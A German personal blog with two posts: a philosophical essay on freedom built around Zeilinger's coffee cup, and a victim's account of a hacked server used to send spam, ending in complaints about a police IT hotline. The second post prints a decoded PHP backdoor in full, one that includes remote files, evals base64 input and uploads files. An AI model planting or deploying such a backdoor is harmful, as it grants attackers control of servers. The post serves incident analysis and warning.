Die Kaffeetasse

Freiheit ist nicht beliebig denkbar. Als ich Anton Zeilinger in einem Gastvortrag an der LMU München hörte, behauptete er, dass ihm kein Philosoph die Frage hätte beantworten können, dass die Kaffeetasse in seinem Labor das Experiment beeinflussen könnte und diese Handlung, dann ja die physikalische Wahrheit beeinflusse.

Ich denke die Frage wurde von mehr als einem Philosophen bereits beantwortet, jedoch gefällt die Antwort dem Experimentalphysiker Zeilinger nicht. Es ist weniger eine Frage, wie die Antwort auf unsere Handlungsfreiheit lautet, sondern eher wie wir damit umgehen. Ähnlich dem Doppelspaltexperiment ist die Freiheit einerseits in unendliche Möglichkeiten als Freiheit wahrnehmbar, kann sich aber nur in einer Handlung vollenden.

So mag es den Experimentalphysiker verwirren, dass sein Handlung in Form des Messens das Experiment beeinflusst und würde er nicht messen, dann gäbe es den Einfluss nicht. Auf der anderen Seite, könnte er selbst das nicht tun, wenn nicht viele Handlungen in der Vergangenheit vorausgegangen wären. Die Freiheit etwas Neues zu entdecken, hat nur der, der das Alte kennt.

Selbstverständlich sind die Tatsachen des Physikalischen einerseits unbestritten andererseits aber nur auf einer zweitausendjährigen Handlungsabfolge denkbar. Es ist reine Spekulation, ob manches nicht hätte früher entdeckt werden können, wenn die Geschichtsläufe andere gewesen wären. Aber Zeilingers Kaffeetasse wird für Aristoteles zu einem undenkbaren Begriff, weil Kaffee kein Begriff gewesen wäre. Für das Wissen Kaffee muss ich weder wissen, dass der Begriff im 9. Jahrhundert entstanden ist, noch muss ich als Zuhörer das Problem verstehen. Wenn ich aber als Experimentalphysiker die Frage nach der Freiheit stelle, dann sollte einem wenigstens die Unfreiheit bewusst sein, die die Vergangenheit unabänderlich macht. Ohne diese Vergangenheit hiesse die Kaffeetasse nicht Kaffeetasse und wir hätten ohne diesem nicht einmal einen Begriff davon, was Zeilinger mit seiner Frage meinen könnte.

Aber vermutlich wäre Zeilinger nie Experimentalphysiker geworden, wenn er darüber zuviel nachgedacht hätte. Es ist wesentlich leichter die Begrifflichkeiten anzunehmen und auf diese Aufzubauen, als sie zu hinterfragen. Der Wissenserwerb im Vertrauen auf die festgelegten Begrifflichkeiten ist sicherlich angenehmer und einfacher.

Freiheit vollendet sich schon bei der Geburt dahingehend, dass zwar die theoretische Freiheit besteht eine der 4000 Sprachen der Menschheit zu wählen, aber tatsächlich die Muttersprache bestimmender ist für die Erstsprache eines Menschen. Damit Anton Zeilinger seine Frage überhaupt stellen kann, muss sich die gesamte Physik als Wissenschaft so entwickelt haben, wie sie sich entwickelt hat. Er hat in diesem Moment soviel Begrifflichkeiten bereits akzeptiert und als wahr angenommen, dass er wahrscheinlich nie Experimentalphysiker geworden wäre, wenn er das nicht hätte.

„ἐξ ὧν δὲ ἡ γένεσίς ἐστι τοῖς οὖσι, καὶ τὴν φθορὰν εἰς ταῦτα γίνεσθαι κατὰ τὸ χρεών· διδόναι γὰρ αὐτὰ δίκην καὶ τίσιν ἀλλήλοις τῆς ἀδικίας κατὰ τὴν τοῦ χρόνου τάξιν.“ soll vom Vorsokratiker Anaximander stammen „Von den aber, die sagen, das Prinzip sei eines, bewegt und unbegrenzt, hat Anaximander, Sohn des Praxiades, aus Milet, Nachfolger und Schüler des Thales, behauptet, Prinzip und Element der seienden Dinge sei das Apeiron, wobei er als erster diese Bezeichnung des Prinzips eingeführt hat. Er behauptet, dieses sei weder Wasser noch ein anderes der sogenannten Elemente, sondern eine bestimmte andere, unbegrenzte Natur, aus der alle Himmel und die darin befindliche Ordnung entstünden. Das Vergehen der seienden Dinge erfolge in die Elemente, aus denen sie entstanden seien, gemäß der Notwendigkeit: Denn sie zahlten einander Strafe und Buße für ihre Ungerechtigkeit nach der Ordnung der Zeit; so äußert er sich darüber in poetischeren Worten.“ und als die alten Griechen in der Renaissance nach Europa zurückkehren taucht Zeilingers Kaffeetasse mit den Worten auf „Wäre der Wille, vor zwei vollständig identische Alternativen gestellt, in der Lage, eine Alternative der anderen vorzuziehen?“ und wird auch als Buridans Esel bezeichnet. In der Informatik wird die Situation auch als Deadlock bezeichnet. Die Informatik hat übrigens drei Antworten zum Abstellen von Zeilingers Tasse. Das wären Abbruch, Warten auf ein veränderndes Ereignis oder Zurückgehen.

Nun ist es aber so, dass es zwei vollständig identische Alternativen gar nicht gibt. Zwei vollständig identische Alternativen würde bedingen, dass weder Zeit noch Ort verändert werden dürften. Alleine die Sonne bewegt sich mit circa 250 Kilometern pro Sekunde um das Zentrum der Milchstraße. Aber die Milchstraße als Galaxie entfernt sich von der nächsten lokalen Gruppe mit circa 60 km pro Sekunde. Jeder hat sich in einer Millisekunde mindestens 250 m von seinem Ort im Universum entfernt ohne irgendetwas getan zu haben. Wir könnten natürlich auch versuchen die Zeit anzuhalten, aber auch das wird uns nicht gelingen. All unsere Experimente sind dieser Bewegung unterworfen und wir können nur festhalten, was innerhalb dieser Bewegung gleich bleibt. Da scheint doch die menschliche Entscheidung, eine Kaffeetasse abzusetzen oder nicht, doch recht bedeutungslos.

Wir betrachten Wissen nur dann als Wissen, wenn es trotz dieser ständigen Änderungen, denen wir zwangsweise unterliegen, das Wissen sich nicht ändert. Genauso wie Buchstaben keine Buchstaben mehr wären, wenn sich die Regeln ihres Gebrauches sich sekündlich ändern würden. Die Begriffe wie Kaffeetasse bilden sich in der Zeit und überwinden dann die Zeit. In der Konstanz liegt letztlich das Verstehen und nicht in der Beliebigkeit. Unsere Freiheit ist nie beliebig, denn dann wäre auch Freiheit begriffslos.

Aber gerade das Wissen zeigt, dass damit nicht zu verstehen ist, dass etwas unveränderlich wäre. Überwunden wird das alte Wissen nicht dadurch, dass das Alte weggeworfen würde. Neues Wissen zeigt sich dadurch, dass das alte Wissen integriert wird. Die Freiheit etwas Neues zu entdecken, hat nur der, der das Alte kennt.

Server gehackt

Dieser Server hier wurde also gehackt und zum Spammen missbraucht. Genauer gesagt es lag hier auf dem Server eine owncloud-Instanz rum, die phpunit als Modul installiert hatte und die Sicherheitslücke dieser zugegebenermaßen ungepflegten und ungewarteten darüber hinaus ungenutzten Instanz wurde gehackt und Code eingeschleust.


In den Logs kann man dann mit der Suche nach „Punkt n.php Fragezeichendir=“ (so geschrieben weil witzigerweise modsecurity hier das Update des Postings blockt, warum der Eindringling es dann trotzdem hochladen konnte, ist für mich noch ein Rätsel) dann sehen wo sich der Angreifer überall rumgegtrieben hat. Wie das Anlegen der tbmailer.php unter WordPress ging es wohl von Anfang an darum Spamsoftware zu installieren. Die tbmailer.php existierte auf jeden Fall schon am ersten August wurde aber nicht zum Spammen verwendet. Vielleicht funktionierte sie nicht so wie gewünscht.

Der Angreifer hätte auch alles von diesem Server löschen können, wenn er gewollt hätte oder lustige Bildchen hinterlassen mit „Dieser Server wurde gehackt„. Aber man bewegte sich unauffällig. An einem Tag hier ein bisschen und einem anderen Tag da ein bisschen. Am 3.8.2019 schlug man dann mit einer leafmailer.php in .well-known zu und jagte über 2 Tage so ungefähr 12.000 Spammails raus.

Installiert wurde die Datei von einer indonesischen Mobilfunkip aus. Der Angriff wäre nicht so nachvollziehbar, wenn der Angreifer die Logdateien gelöscht hätte. Möglich wäre ihm das gewesen, da der Apache auch Zugriff auf die Logs hat. Vielleicht hätte man das ja später auch getan und ist vielleicht nur schneller aufgeflogen als die Angreifer gedacht haben.

Ein bisschen ist ja mein Server wie ein Honeypot eine Ägyptische IP schaute sich eine config.php im Stammverzeichnis an. Die lag da von einer phpgedview-Installation unkonfiguriert rum und ich hatte sie nie gelöscht. Von aussen ist die auch über https://bgeserver.de/config.php erreichbar. Aber über IndoXploit sieht man natürlich dann auch den Quelltext der Datei. Wäre sie konfiguriert gewesen, wäre darin ein Mysql-Passwort zu finden gewesen. Genauso erging es ihm mit einem unkonfigurierten Roundcube, dass da so rum lag. Eine amerikanische IP machte sich dann über wordpress her allerdings betrachtete er sich auch die config.php im Stammverzeichnis.

Logeinträge wie

„Undefined index: act in „…“ on line 1739, referer: „…“idx_config&do=cpanel“

zeigen, dass auch nach einem Webserverkonfigurationsinterface gesucht wurde. Hat dieser Server nicht, ich mache alles mit ssh.

Weit verstreut auf dem Server befand sich danach ein haccess.php. Der Code dieser Datei war in base64 dekodiert und das entschlüsselte Ergebnis auch nochmal in base64 – das dann nochmal entschlüsselt ergab dann:


error_reporting(0); ${„GLOBALS“}[„dxpggwemd“]=“ev“;$kiejpi=“ev“;$imivhcblfl=“in“;$hgrptjcx=“in“;${„GLOBALS“}[„ysfombthhq“]=“in“;${$imivhcblfl}=$_GET[„in“];if(isset(${${„GLOBALS“}[„ysfombthhq“]})&&!empty(${$hgrptjcx})){echodie(include_once $in);}${$kiejpi}=$_GET[„ev“];if(isset(${${„GLOBALS“}[„dxpggwemd“]})&&!empty(${${„GLOBALS“}[„dxpggwemd“]})){eval(base64_decode(${${„GLOBALS“}[„dxpggwemd“]}));exit;}if($_GET[„send“]==“ok“){echo“<form action=\“\“ method=“post\“ enctype=\“multipart/form-data“ name=\“country“ id=\“country“><input type=“file“ name=“file\“ size=“50\“><input name=“_con“ type=\“submit“ id=“_con“ value=\“home“></form> „;if($_POST[„_con“]==“home“){if(@copy($_FILES[„file“][„tmp_name“],$_FILES[„file“][„name“])){echo“done :d“;}else{echo“error“;}}exit;}

Wenn ich den Code richtig kapiere lassen sich damit dann beliebige Dateien auf den Server nachladen. 

Owncloud hatte ich Anfang 2016 auf dem Server für das Bündnis Grundeinkommen mal installiert, war aber als Arbeitsplattform irgendwie untauglich. Ich hätte das damals wieder löschen sollen, statt einfach ungewartet auf der Platte rumliegen zu lassen. Jetzt ist es gelöscht. 

Am meisten nervt mich wahrscheinlich, das ich nicht ganz rausgefunden habe, wann und wie genau sie reingekommen sind. Sowas

\x16\x03\x01\x00\x7F\x01\x00\x00{\x03\x03\x98\x83\x17\xE2\x08z&\x0F\x11\x12a\xA3\xB3\xAA9\xBD(7\x8E\xA5\xA9\xCE\xC9\xCD\xC8\xEB\x96\xA8\xF9\x06\xC0\xA5\x00\x00\x1C\xC0/\xC0+\xC00\xC0,\xC0\x13\xC0\x09\xC0\x14\xC0

bekomme ich zumindest nicht sinnvoll dekodiert.

Nebenbei habe ich dann noch erfahren, dass es eine IT-Hotline für Notfälle von der bayerischen Polizei seit dem 1.8.2019 unter der 089/1212-4400 gibt. Habe dort nachdem ich mich auf Twitter über den Hack ausgekotzt hatte und die Polizei München mir diese Nummer empfahl tatsächlich angerufen.

VERGESST DIE NUMMER WIEDER DIE TAUGT NIX.

Nach einer Ansage für was sie alles nicht zuständig sind und 5 Minuten gedudel ich glaube es war Mozart oder Vivaldi hatte ich so einen „Fachmann“ am Apparat. Ich glaube, der hat kein Wort verstanden, was mein Problem ist. Sein Rat war doch tatsächlich ich solle den Rechner zur Polizeidienststelle bringen. Mal abgesehen davon, dass das hier gar kein Rechner ist, sondern eine virtuelle Maschine im Internet, besteht der Notfall ja darin den Spammer dahingehend zu stoppen, dass er keinen Spam mehr über diese Maschine schickt. Als ich dort anrief hatte ich die tbmailer.php unter WordPress noch gar nicht entdeckt. Den Spam über leafmailer.php hatte ich ja bereits gestoppt. Ich Naivling dachte mir „Oh toll, die Polizei hat für solche Fälle jetzt eine Notfall Hotline und kann Tipps geben, was man schauen sollte.“ Pustekuchen!

Das die Eindringling IndoXploit verwenden wusste ich zum Zeitpunkt meines Anrufes bereits und dass der Spam über leafmailer.php eingesteuert wurde auch. Aber für die IT-Notfall-Hotline war das alles spanische Dörfer. Der wusst noch nicht mal was Owncloud ist, mit der Bemerkung, dass man ja nicht jeden Trojaner kennen könne. Autsch – ausgerechnet, das was kein Trojaner war, sondern die befallene Software bezeichnete er als Trojaner. Das richtig gefährliche Zeug wie die Backdoorshell IndoXploit war ihm ebenso unbekannt wie leafmailer.php. Wahrscheinlich dürfen die in der Behörde kein Google benutzen. Der erste Link bei der Suche nach leafmailer.php wirft das https://github.com/bediger4000/php-malware-analysis/tree/master/leafmailer aus. Und einmal IndoXploit eingeben und man landet beim Sourcecode https://github.com/linuxsec/indoxploit-shell

Der Anruf war also eher was zum Lachen oder Weinen, aber auf keinen Fall eine Hilfe. Nachdem ich ihm erklärt hatte, dass das mit dem Rechner zur Polizei bringen nicht ist, weil das kein phyiskalischer Rechner ist. Fasselte er was ich solle zur Polizeidienststelle gehen und dann halt dort Zugriff auf den Rechner im Netz geben. Dann erklärte ich ihm, dass quasi die Polizeidienststelle ihn empfohlen hätte https://twitter.com/PolizeiMuenchen/status/1159035915081310208

Er erklärte mir dann, dass die Polizeidienststelle die Hotline wohl falsch verstanden hätte. Nun gut ich kann es der Polizei nicht verübeln, denn den Tweet den sie zitierte sagte vom Bayerischen Landeskriminalamt:

Hotline der Bayerischen Polizei für IT-Notfälle:
089/1212-4400
Hilfe bei Internet-/Computerkriminalität, z.B.
Phishing-Mails
Passwort-Hacking
Schadsoftware

Und jetzt überlegt Euch, was obiger Fall mit dem leafmailer.php eigentlich ist

Große Sprüche über Twitter raushauen, aber eigentlich gar nicht liefern können. Als ich ihm noch erklärte, dass der Täter aus Indonesien eingebrochen ist und die Münchner Polizei da wohl etwas machtlos sei, war das Gespräch eigentlich zu Ende.

Er meinte noch, ich könnte den Schaden ja anzeigen. Danke verzichte, wenn ich den Rechner dann zur Polizeidienststelle tragen muss – möglicherweise das ganze Rechenzentrum – mein Provider killt mich, wenn ich das täte.

Fazit lasst keine alte ungepflegte Software rumliegen und habe einen Blick auf die CVEs und vergesst die deutsche Polizei bei Internetkriminalität, die haben immer noch null Ahnung. Es ist ein Trauerspiel.